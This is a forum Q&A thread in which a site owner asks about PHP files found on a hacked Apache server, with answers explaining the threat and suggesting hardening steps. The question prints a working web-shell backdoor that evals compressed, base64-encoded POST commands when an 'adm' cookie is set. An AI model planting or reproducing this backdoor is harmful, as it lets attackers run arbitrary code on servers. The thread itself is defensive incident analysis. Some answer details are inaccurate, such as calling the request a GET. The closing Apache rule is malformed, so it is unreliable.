PHP code help - hacked apache server

Question

I have discovered the following code appear in two identical .php files on more than one of my server's websites. The files have inconspicuous names such as "reminder.php" (but a different name everytime) and appear in my /scripts/ and /uploads/ folders, sometimes other folders instead.

Their appearance is not entirely random but I don't know enough about Apache servers or PHP to know a) how it got there b) what it does.

Checking the logs they all appeared at similar times and were called once and that is all.

Any help would be greatly appreciated.

if (isset($_COOKIE["adm"])) {
    if (isset($_POST['crc'], $_POST['cmd'])) {
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else 
            echo "repeat_cmd";
    }
}

Answer 1

The main problem for you is, how do these files came here?

Several possibilities:

• the FTP client of someone having FTP access to the server is hit by a virus. This is an easy way to put PHP scripts on web server for hackers. So run a recent antivirus on all computers having access via FTP to your webserver
• the webserver uns several web applications and one of them is really bad, so do not forget to check all web applications, and maybe try to set different open_basedir restrictions on each web application (put that in virtualhosts). Study how to set per-application php settings with php_value instructions and adapt at least open_basedir, upload_tmp_dir and session.save_path
• your current web application allows files to be uploaded on directories, check all your file uploads snippets, and read the PHPSec Security Guide (and any other resource on PHP security like the Architect's Guide To PHP Security by Ilia Alshanetsky ) to fix them.
• if you cannot fix the application, then study solutions proxing the application with some security rules, filtering user inputs, like, maybe, mod_security, but they're others.

To avoid execution of PHP scripts on directories which should not contain php scripts (like your upload folders) you can add this rule (either in a <Directory> section or .htaccess):

AddType text/plain .php
AddType text/plain .phps
AddType text/plain .php3
AddType text/plain .php4
AddType text/plain .php5
Options -Indexes

This will force all php files from this directory to be served as simple text. Another solution is to force a lot of extensions to become cgi scripts, and then to disallow execution of cgi-scripts:

Options -ExecCGI
AddHandler cgi-script .php .php3 .php4 .php5 .phps .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi 

You could also limit the file allowed there based on extensions (here if it is not an image it's forbidden):

<Files ^(*.jpeg|*.jpg|*.png|*.gif)>
   order deny,allow
   deny from all
</Files>

Answer 2

Basically, that code lets a user do this:

yoursite.com/reminder.php?cmd=blahblahblah

This part:

blahblahblah

Is a gzip comressed base64 encoded string. Once decoded and uncomressed, it is eval()d by the server.

In other words, your server is screwed, because anybody can run any code on it, including uploading files, deleting things, editing things, etc.

I suggest you take your site offline right now until you fix it.

---

The problem might be an unsanitized and public /uploads directory. If you don't filter users' uploads and keep you uploads folder public, they can upload and execute anything they wish.

What is running on your website? A CMS? Or is it entirely hand-made?

Answer 3

The file allows malicious person(s) to execute any PHP code they want on your system.

Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed "cmd", base64 decode it, gzip uncompress it, and evaluate it as PHP.

I'd recommend changing your passwords, and maybe reinstalling apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.

Answer 4

This code will execute (on the server) any arbitrary code it finds in the POST request if the key adm is present in the client's cookie. That request will be Base-64 encoded and encrypted to obfuscate its contents. Any code at all may be executed, including one to format your hard drive (if your PHP server is set to allow that).

You have been hacked. Take the server offline, right now. Get some help running an analysis before you wipe your host, if you can - you don't want to reinstall and go online, just to get hacked again. Changing all your passwords and locking down your server is a good start.